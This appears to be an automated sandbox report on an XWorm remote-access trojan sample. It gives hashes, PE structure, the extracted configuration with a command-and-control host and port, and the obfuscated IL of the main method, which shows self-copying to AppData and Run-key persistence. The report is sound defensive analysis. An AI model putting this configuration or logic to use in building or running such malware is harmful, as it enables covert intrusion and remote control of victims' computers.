Malicious
Malicious

d418bd5723579f39a928e9a4feb33e81

PE Executable
|
MD5: d418bd5723579f39a928e9a4feb33e81
|
Size: 68.61 KB
|
application/x-dosexec

Infection Chain
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very high

Hash
 Hash Value
MD5
d418bd5723579f39a928e9a4feb33e81
Sha1
e9f72fa5d1fd1f9dbf355c2f2de4bf1418663977
Sha256
b956416209869d972fa4e630e662e6f5ec0fdacf1c26a03e290a20a51130e439
Sha384
686405d5f2e342f4402663d6dc0ce32f6c838188d0e43a8924b68bdcf8280cfe9cdca471ed0f8010072f6849d9725f18
Sha512
ef5a362955b9957cacea551407f12b5a1b829482b1b111ef872bca95a89404107ecb4988781b8547e7784ba3ed717cafab3b9b8adf32d543bc1286814bd9b974
SSDeep
1536:LcITeoGzeEbHqyRPulIqx3bKaSfRng6/O62Ib8:AITHilKxlIwbKaSZpO6fb8
TLSH
E4638D5877E00965D4FEAFB048F22222C734AB13A903EB5F78DC05DD272768989917F6

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
d418bd5723579f39a928e9a4feb33e81
Malicious
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Malware Configuration - XWorm config.
Config. Field
 Value
Mutex

yrFafqOjWo1AhGTQ
Hosts

127.0.0.1,been-club.gl.at.ply.gg
Port

55790
KEY

<1234567890>
USBNM

<Xwormmm>
LoggerPath

%AppData%
family

xworm
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

XWormClient.exe
Full Name

XWormClient.exe
EntryPoint

System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::lGlKNlXWlH1pHIiVjjlWPJQPZw0jltQ2UC9rx()
Scope Name

XWormClient.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

XWormClient
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

370
Main Method

System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::lGlKNlXWlH1pHIiVjjlWPJQPZw0jltQ2UC9rx()
Main IL Instruction Count

164
Main IL

ldsfld System.Int32 PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::ER4Ej1tICp4xFZUmggWxOXyyaPejq5vrtEbtjCdU4FzQHBEweNpjVc6xPYlzcfs2TJuyZaK2XNY87rtDjYfwa0fYYZUtveY ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::9kDm0dcvilQovMhjkTq6IpFXCUf4F0HuvMm8ydxIZnRKWQC4cHI2TC3XlcEoRLerD2T7ZgdQc3mHeTWhbRaLBmt11aW1L4x call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::9kDm0dcvilQovMhjkTq6IpFXCUf4F0HuvMm8ydxIZnRKWQC4cHI2TC3XlcEoRLerD2T7ZgdQc3mHeTWhbRaLBmt11aW1L4x ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::OC2EFcYJ7huRVlx6Omzy1gVOV7LxKPwmXq6U31Uj579hhxWZkmKf915J8L7UABw1z4ygHjnUqSJ5vUW520HSXT70Mzp1vhI call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::OC2EFcYJ7huRVlx6Omzy1gVOV7LxKPwmXq6U31Uj579hhxWZkmKf915J8L7UABw1z4ygHjnUqSJ5vUW520HSXT70Mzp1vhI ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::oipLH4fCgOOndxiLx4bZt2e9jTbjCkUxDAT1fjfbiTztvSqlxJvTVbf120shQ20sCHbLPsIwAmFmocZTZCBA5pQzyIoF8aC call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::oipLH4fCgOOndxiLx4bZt2e9jTbjCkUxDAT1fjfbiTztvSqlxJvTVbf120shQ20sCHbLPsIwAmFmocZTZCBA5pQzyIoF8aC ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::7QTtZvTYXZfuDYA72tnqMtVThbRmGHNQpRHSrPg4IPgbMJ1pVOQ0Lo92oGiWAZsVqqhHSMYqpS2VTpRhcY4lyDyHxLpfFFg call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::7QTtZvTYXZfuDYA72tnqMtVThbRmGHNQpRHSrPg4IPgbMJ1pVOQ0Lo92oGiWAZsVqqhHSMYqpS2VTpRhcY4lyDyHxLpfFFg ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::wvbtfYD5JEP9rjyRAEYh7HP4wmoKQP3EkOQIFEzq7EADJvID2YB7tKTGgziALb94TkYvuyS9uCHavm99MiOc8Wv3kyKf5rc call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::wvbtfYD5JEP9rjyRAEYh7HP4wmoKQP3EkOQIFEzq7EADJvID2YB7tKTGgziALb94TkYvuyS9uCHavm99MiOc8Wv3kyKf5rc ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::ZwRX7kWNfFOH1wP7TFeW1hjY1MlAvssghsOQOS5ZeQu0e8ObZy2MLBgG3IPnFabV9pBZjIjDVT5VbjtVSdm8OoGaWrnXFkd call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::ZwRX7kWNfFOH1wP7TFeW1hjY1MlAvssghsOQOS5ZeQu0e8ObZy2MLBgG3IPnFabV9pBZjIjDVT5VbjtVSdm8OoGaWrnXFkd ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::o9ysLIZ9nEWz26N70izmHkWBk3lThNplv9TqsD5qPf3nwqD6sRK3umXUgiFSp6Hr0cTM0j5rTMjK3zKLHdVsidbBfNJEQKd call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::o9ysLIZ9nEWz26N70izmHkWBk3lThNplv9TqsD5qPf3nwqD6sRK3umXUgiFSp6Hr0cTM0j5rTMjK3zKLHdVsidbBfNJEQKd ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::nC1bMn7LjT1BEod5TuR9e44yU9c3Ote4bRbyEQm4jjE8f8SuG6cjZQej2hSRNUsH62FnBPh1G4ghOxdR9QY0F9tcODyZozv call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::nC1bMn7LjT1BEod5TuR9e44yU9c3Ote4bRbyEQm4jjE8f8SuG6cjZQej2hSRNUsH62FnBPh1G4ghOxdR9QY0F9tcODyZozv ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::E6sFfwbD0rMSsbNH4GxBoW1HWc6lmnU99tVlhWsXTlB7i8YCTqDaGaUbBRxvhG4eoycm2FWcHIcRJDgBAUMFTd8O9VvUi4d call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::E6sFfwbD0rMSsbNH4GxBoW1HWc6lmnU99tVlhWsXTlB7i8YCTqDaGaUbBRxvhG4eoycm2FWcHIcRJDgBAUMFTd8O9VvUi4d ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::h4BKb2INWcov2CfJZYRWO5Q4khAc9BXTvkGmtIDvuuIYx8Pc0MCHtCMVDeL3OLp5ZScDU0e93ZWSCO1fgmyqraUYwepHSDa call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::h4BKb2INWcov2CfJZYRWO5Q4khAc9BXTvkGmtIDvuuIYx8Pc0MCHtCMVDeL3OLp5ZScDU0e93ZWSCO1fgmyqraUYwepHSDa ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::B42e05YlpSMIplU3oZlp5MZ5oEJcsRUhlZiyUIuoMmLj8K3mJLVi3Bv9Dq4dvGI6ElEkdfv6PXzNcxLginsQyNJ0aiKRJNA call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::B42e05YlpSMIplU3oZlp5MZ5oEJcsRUhlZiyUIuoMmLj8K3mJLVi3Bv9Dq4dvGI6ElEkdfv6PXzNcxLginsQyNJ0aiKRJNA ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::lO5dfaaAicF9Yq2nJxX9PENxx9VkiomUv5w0kfxrk17VelAIYLCiYqpAW6xheAAGvoKW5zGB6KqBmhQZ9UpiEOA2ua2Eu74 call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::lO5dfaaAicF9Yq2nJxX9PENxx9VkiomUv5w0kfxrk17VelAIYLCiYqpAW6xheAAGvoKW5zGB6KqBmhQZ9UpiEOA2ua2Eu74 ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::zDV1tWz2gAVCLN9avVKFzxrlYZcBSt4VnvKEDdhVurdXQlCLq4hAdMvhSi5ql3C6K8KbE6zRPsHoca9XzY1ltxuhr4fvKQp call System.Object Stub.OrUQrtouRkXeftYRKNx8MVHWLIo832llM0k9u::4tC8r57NkOZqHUWQGoN1iDPrplurOyiIrCPrp5m2oZDxfpHsTuGfQ2BttNcFCj2nPkP6w(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::zDV1tWz2gAVCLN9avVKFzxrlYZcBSt4VnvKEDdhVurdXQlCLq4hAdMvhSi5ql3C6K8KbE6zRPsHoca9XzY1ltxuhr4fvKQp leave.s IL_012F: call System.Boolean Stub.Y5Jl1AAeZzToLDhbMsZ4tHc5OtjoS7XmGoEtAo8vE6RMg6cavSz5VrwuGczrclYfWluPD::pb5wo3u55kIHmVhBInnRfArdGn4LvA5SJY4oelc5wbdcs92vW6V3n6C6r2znZw7q4RgIO() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.3 <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_012F: call System.Boolean Stub.Y5Jl1AAeZzToLDhbMsZ4tHc5OtjoS7XmGoEtAo8vE6RMg6cavSz5VrwuGczrclYfWluPD::pb5wo3u55kIHmVhBInnRfArdGn4LvA5SJY4oelc5wbdcs92vW6V3n6C6r2znZw7q4RgIO() call System.Boolean Stub.Y5Jl1AAeZzToLDhbMsZ4tHc5OtjoS7XmGoEtAo8vE6RMg6cavSz5VrwuGczrclYfWluPD::pb5wo3u55kIHmVhBInnRfArdGn4LvA5SJY4oelc5wbdcs92vW6V3n6C6r2znZw7q4RgIO() brtrue.s IL_013C: call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::EleIn09MeBrIgb4zYic7F4UWvNy8yV68lT9Lr() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::EleIn09MeBrIgb4zYic7F4UWvNy8yV68lT9Lr() leave.s IL_0152: call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::gRK6kDtck67mvFyuVGVLv7N01OjO6Lj5uotIw() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_4 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0152: call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::gRK6kDtck67mvFyuVGVLv7N01OjO6Lj5uotIw() call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::gRK6kDtck67mvFyuVGVLv7N01OjO6Lj5uotIw() ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::o9ysLIZ9nEWz26N70izmHkWBk3lThNplv9TqsD5qPf3nwqD6sRK3umXUgiFSp6Hr0cTM0j5rTMjK3zKLHdVsidbBfNJEQKd ldstr \ ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::nC1bMn7LjT1BEod5TuR9e44yU9c3Ote4bRbyEQm4jjE8f8SuG6cjZQej2hSRNUsH62FnBPh1G4ghOxdR9QY0F9tcODyZozv call System.String System.String::Concat(System.String,System.String,System.String) stloc.0 <null> ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.DirectoryInfo::get_FullName() stloc.s V_5 ldloc.s V_5 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_0199: ldloc.0 ldloc.s V_5 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_01B0: ldc.i4 1000 ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_6 ldloc.s V_6 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.0 <null> ldsfld System.String Stub.Y5Jl1AAeZzToLDhbMsZ4tHc5OtjoS7XmGoEtAo8vE6RMg6cavSz5VrwuGczrclYfWluPD::t67BSKtqIOXnXocMIo1P7eUiqjGLHbBOzsxEMufyHeRjytviDDOoWmbHjVhjIpSr6QLYE call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_01DB: call My.VekTrXgNw58OgpA8d4Nk3k9Z4ZDvhsglJtnBQgiSilHmvoABmCMMDKfe60tyXxP8gtv95BO7fYWFsxiwgvWYTLI5heu6wtY My.Vn7WFSuMpqo0fL56inO1D4uSO5JzzYEWTCWp0OFuHzGoVUZJgMknG9eXPMyJac1d177K2tJS5Zz2tcjMwOOThbCQVAnNyWf::DGllS7L4u6OqTHtM6Fs9q4TeLO95UDgGxHfLVsI8BxpYyjfShkNGdNGUkKmo7D4gK93PnjPqzUVwKGBs9YO3AmEbZLr9xPU() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_7 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01DB: call My.VekTrXgNw58OgpA8d4Nk3k9Z4ZDvhsglJtnBQgiSilHmvoABmCMMDKfe60tyXxP8gtv95BO7fYWFsxiwgvWYTLI5heu6wtY My.Vn7WFSuMpqo0fL56inO1D4uSO5JzzYEWTCWp0OFuHzGoVUZJgMknG9eXPMyJac1d177K2tJS5Zz2tcjMwOOThbCQVAnNyWf::DGllS7L4u6OqTHtM6Fs9q4TeLO95UDgGxHfLVsI8BxpYyjfShkNGdNGUkKmo7D4gK93PnjPqzUVwKGBs9YO3AmEbZLr9xPU() call My.VekTrXgNw58OgpA8d4Nk3k9Z4ZDvhsglJtnBQgiSilHmvoABmCMMDKfe60tyXxP8gtv95BO7fYWFsxiwgvWYTLI5heu6wtY My.Vn7WFSuMpqo0fL56inO1D4uSO5JzzYEWTCWp0OFuHzGoVUZJgMknG9eXPMyJac1d177K2tJS5Zz2tcjMwOOThbCQVAnNyWf::DGllS7L4u6OqTHtM6Fs9q4TeLO95UDgGxHfLVsI8BxpYyjfShkNGdNGUkKmo7D4gK93PnjPqzUVwKGBs9YO3AmEbZLr9xPU() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String PzhGPjD6X99EJ6DilRB9Hd1iOzBo5fSITYZKh6UhTp1ptrNX81G3npCjGZV4xfCQt3f9py1EmqZ5SWQMzwIUElZmWF9X3v5::nC1bMn7LjT1BEod5TuR9e44yU9c3Ote4bRbyEQm4jjE8f8SuG6cjZQej2hSRNUsH62FnBPh1G4ghOxdR9QY0F9tcODyZozv call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.0 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave.s IL_0216: call System.Void Stub.Y5Jl1AAeZzToLDhbMsZ4tHc5OtjoS7XmGoEtAo8vE6RMg6cavSz5VrwuGczrclYfWluPD::TRUCY44wIBtWlAmTZXv9uie0TEfqwQrR8Oob1Nv7vBXD3vLrnaFB9xyg2HUmWJzbdd4uP() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_8 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0216: call System.Void Stub.Y5Jl1AAeZzToLDhbMsZ4tHc5OtjoS7XmGoEtAo8vE6RMg6cavSz5VrwuGczrclYfWluPD::TRUCY44wIBtWlAmTZXv9uie0TEfqwQrR8Oob1Nv7vBXD3vLrnaFB9xyg2HUmWJzbdd4uP() call System.Void Stub.Y5Jl1AAeZzToLDhbMsZ4tHc5OtjoS7XmGoEtAo8vE6RMg6cavSz5VrwuGczrclYfWluPD::TRUCY44wIBtWlAmTZXv9uie0TEfqwQrR8Oob1Nv7vBXD3vLrnaFB9xyg2HUmWJzbdd4uP() ldnull <null> ldftn System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::bSERuEIx4LoGS2N4owx7FCYhOZF9dMKOSmdef() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() ldnull <null> ldftn System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::oIjOmuxXL2CscGJB8diAvJpTGE6ZeSyIzwfuT() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() call System.String Stub.ygrTwjprA3WB8o3n6QhIZAJZtRSDZkUUrNkUa::J5NRYsTdAcOHg731zTdNtjIpD5sHE9PUXxM0P() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_0258: call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::Ut6lF3SV5jYUPJxCOXVkwbUYF07lTlrERnvsR() call System.Void Stub.YgViWqfb1qmddYsn3NWlJ9reDmNNojlhdoBfm::DXwOHkGFlDFxZTgXlbd9WmhGeR4ac1zAI03aF() call System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::Ut6lF3SV5jYUPJxCOXVkwbUYF07lTlrERnvsR() ldnull <null> ldftn System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::A594cDxv0Up1xfMlQDrwTzMCcuACP0owrYaiN() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.1 <null> ldnull <null> ldftn System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::EFnhamSkxRZi9It340U5wQeLXHBOuJ1qHbiEm() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.1 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null>
Module Name

XWormClient.exe
Full Name

XWormClient.exe
EntryPoint

System.Void Stub.4TzbsG5HhPhZv9sflr2UAq3yDlbPOGcSsvpHLUxHNo5DEK3SFKVMB3ZTOPxlqGIhf91BU9m3rosPcb2blwjQ81TGycvHqnf::lGlKNlXWlH1pHIiVjjlWPJQPZw0jltQ2UC9rx()
Scope Name

XWormClient.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

XWormClient
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

370
Main Method

